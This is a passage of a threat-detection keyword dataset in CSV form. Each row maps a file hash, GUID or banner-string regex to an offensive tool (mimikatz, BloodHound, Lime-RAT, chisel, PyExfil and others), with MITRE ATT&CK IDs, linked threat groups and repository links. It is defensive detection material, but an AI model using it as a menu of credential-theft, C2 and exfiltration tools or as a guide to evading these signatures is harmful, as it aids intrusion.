"*9fd62a2ee41355f974bf08ef13a49c7007c39f0f088e4f4fefb526ded4de44d9*",".{0,1000}9fd62a2ee41355f974bf08ef13a49c7007c39f0f088e4f4fefb526ded4de44d9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32112"
"*9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf*",".{0,1000}9fd9e9bb045670d564e0922020d56e56621b2710de01b683015accc2ddf977bf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32113"
"*9fdebdd052d328f15c841b9616ab0a2344a02e0a2fad25f717a73bf6490018ce*",".{0,1000}9fdebdd052d328f15c841b9616ab0a2344a02e0a2fad25f717a73bf6490018ce.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32114"
"*9fe02af5b7e2f22489b42a2c0888731f8be61f296d83ef8d0706c54b30d7c409*",".{0,1000}9fe02af5b7e2f22489b42a2c0888731f8be61f296d83ef8d0706c54b30d7c409.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32115"
"*9fe31fab0dab2f646ca5703beb86d5659ddb7bc6f8f20640c0e1c04b10879136*",".{0,1000}9fe31fab0dab2f646ca5703beb86d5659ddb7bc6f8f20640c0e1c04b10879136.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32116"
"*9FEA6712-3880-4E5F-BD56-8E58A4EBCCB4*",".{0,1000}9FEA6712\-3880\-4E5F\-BD56\-8E58A4EBCCB4.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32117"
"*9FF259F26CA9D841AFD5D6AF5B631F6CB267ED602BC50624830DC47EF743483E*",".{0,1000}9FF259F26CA9D841AFD5D6AF5B631F6CB267ED602BC50624830DC47EF743483E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32119"
"*9ff68520e3478d33ab150b7f4db42cbd9d2b9268aad3447a2ba20dd60771547e*",".{0,1000}9ff68520e3478d33ab150b7f4db42cbd9d2b9268aad3447a2ba20dd60771547e.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","32120"
"*9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad*",".{0,1000}9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","32121"
"*A C# utility for interacting with SCCM (now Microsoft Endpoint Configuration Manager) by Chris Thompson (@_Mayyhem)*",".{0,1000}A\sC\#\sutility\sfor\sinteracting\swith\sSCCM\s\(now\sMicrosoft\sEndpoint\sConfiguration\sManager\)\sby\sChris\sThompson\s\(\@_Mayyhem\).{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","32123"
"*A C# utility for interacting with SCCM (now Microsoft Endpoint Configuration Manager) by Chris Thompson (@_Mayyhem)*",".{0,1000}A\sC\#\sutility\sfor\sinteracting\swith\sSCCM\s\(now\sMicrosoft\sEndpoint\sConfiguration\sManager\)\sby\sChris\sThompson\s\(\@_Mayyhem\).{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","32124"
"*A cross-platform python based advanced sql injections detection & exploitation tool*",".{0,1000}A\scross\-platform\spython\sbased\sadvanced\ssql\sinjections\sdetection\s\&\sexploitation\stool.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","32126"
"*A DNS (over-HTTPS) C2*",".{0,1000}A\sDNS\s\(over\-HTTPS\)\sC2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","32127"
"*A fast multi protocol credential bruteforcer/sprayer/enumerator*",".{0,1000}A\sfast\smulti\sprotocol\scredential\sbruteforcer\/sprayer\/enumerator.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","32128"
"*A keylogger written in eBPF.*",".{0,1000}A\skeylogger\swritten\sin\seBPF\..{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","32129"
"*A La Vie* A L'Amour*",".{0,1000}A\sLa\sVie.{0,1000}\sA\sL\'Amour.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32130"
"*A new browser has connected to us via WebSocket!*",".{0,1000}A\snew\sbrowser\shas\sconnected\sto\sus\svia\sWebSocket!.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","32132"
"*A Python package for data exfiltration.*",".{0,1000}A\sPython\spackage\sfor\sdata\sexfiltration\..{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","32133"
"*A ruby http/https proxy to do EVIL things.*",".{0,1000}A\sruby\shttp\/https\sproxy\sto\sdo\sEVIL\sthings\..{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","32134"
"*A Silent (Hidden) Free Crypto Miner Builder*",".{0,1000}A\sSilent\s\(Hidden\)\sFree\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","32135"
"*A Slowloris Attack is Already Running*",".{0,1000}A\sSlowloris\sAttack\sis\sAlready\sRunning.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#content","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32136"
"*A UDP Attack is Already Running on *",".{0,1000}A\sUDP\sAttack\sis\sAlready\sRunning\son\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","32137"
"*a very fast brute force webshell password tool.*",".{0,1000}a\svery\sfast\sbrute\sforce\swebshell\spassword\stool\..{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","32142"
"*a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4*",".{0,1000}a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32145"
"*a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4*",".{0,1000}a0010bd12872028ba8a53276313527f7a332a23d4cdd0caed1060a45916e8cb4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32146"
"*a0080e0a7da7636d28e71a955f9cfded032fd4311239c2cd35fe78caa8f59abf*",".{0,1000}a0080e0a7da7636d28e71a955f9cfded032fd4311239c2cd35fe78caa8f59abf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32149"
"*a00d934514ff5c2821c706fe33d7719980a6c520f152b4b3e6f8ac254e60f059*",".{0,1000}a00d934514ff5c2821c706fe33d7719980a6c520f152b4b3e6f8ac254e60f059.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32150"
"*a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace*",".{0,1000}a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","32151"
"*a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4*",".{0,1000}a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32152"
"*A017568E-B62E-46B4-9557-15B278656365*",".{0,1000}A017568E\-B62E\-46B4\-9557\-15B278656365.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32153"
"*a01a3fe8fd6c3ff03908efd3321438df49365d0f64fa0a862419e31112936e3e*",".{0,1000}a01a3fe8fd6c3ff03908efd3321438df49365d0f64fa0a862419e31112936e3e.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","32154"
"*a02316234173d1704bae35ba6e194504049f563bd9aa51fef31850256e47ba9c*",".{0,1000}a02316234173d1704bae35ba6e194504049f563bd9aa51fef31850256e47ba9c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32155"
"*a0383a13e4d392d598a445ef8bb82397cf6a86697f435a07d1d2019dd7feb78b*",".{0,1000}a0383a13e4d392d598a445ef8bb82397cf6a86697f435a07d1d2019dd7feb78b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32158"
"*a03aaf164bf92c0d354c6fb6d6b6819a1a87bf465c803de6a0bc47261d3dfb4b*",".{0,1000}a03aaf164bf92c0d354c6fb6d6b6819a1a87bf465c803de6a0bc47261d3dfb4b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32159"
"*a03d2b77a947deea62b87b2d30528a68729cce0614b0fe3aab9f280b9c2186eb*",".{0,1000}a03d2b77a947deea62b87b2d30528a68729cce0614b0fe3aab9f280b9c2186eb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32160"
"*a0411b1b8ea64d342813eefa92371a40ea46ae27bcfca61b72a66950322ecd3f*",".{0,1000}a0411b1b8ea64d342813eefa92371a40ea46ae27bcfca61b72a66950322ecd3f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32162"
"*a04da1ed67edcc4e11d49aeac5aeac4cb09dcdda5e2347a1ce77fa4a079482f1*",".{0,1000}a04da1ed67edcc4e11d49aeac5aeac4cb09dcdda5e2347a1ce77fa4a079482f1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32163"
"*a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3*",".{0,1000}a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32165"
"*a05461fa6d819d987203e7272cbf4e3eeb2879f9a69b27c4b5783cad1c4af29f*",".{0,1000}a05461fa6d819d987203e7272cbf4e3eeb2879f9a69b27c4b5783cad1c4af29f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32166"
"*a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1*",".{0,1000}a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","32167"
"*a05ffecbaa4ce2121ed7ea1a8181f34d41db9fe89e60b800e20eec22631f576d*",".{0,1000}a05ffecbaa4ce2121ed7ea1a8181f34d41db9fe89e60b800e20eec22631f576d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32170"
